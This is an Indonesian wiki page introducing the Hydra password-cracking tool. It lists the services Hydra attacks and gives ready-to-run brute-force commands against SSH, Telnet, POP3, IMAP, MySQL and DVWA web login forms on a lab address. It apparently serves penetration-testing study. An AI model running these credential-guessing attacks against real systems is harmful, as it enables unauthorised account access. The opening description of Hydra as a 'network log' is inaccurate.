Hydra

From OnnoWiki
Revision as of 11:11, 7 February 2016 by Onnowpurbo (talk | contribs)
Jump to navigation Jump to search

Hydra adalah network log yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.


System yang di serang

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird,
FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD,
HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3,
POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Contoh cara menggunakan

hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
hydra -L userlist.txt -P passwordlist.txt ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f telnet://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f pop3://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f imap://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f 192.168.0.80 mysql


Untuk DVWA

hydra -l admin -p password   http-get-form "/DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed"
hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form
hydra –L userlist.txt –P passwordlist.txt –e ns –t 32 –u –f –m /DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&Login=Login 192.168.0.80 http-post-form


Referensi

General usage and options

HTTP basic auth

HTTP form based auth

Multiple protocols

Telnet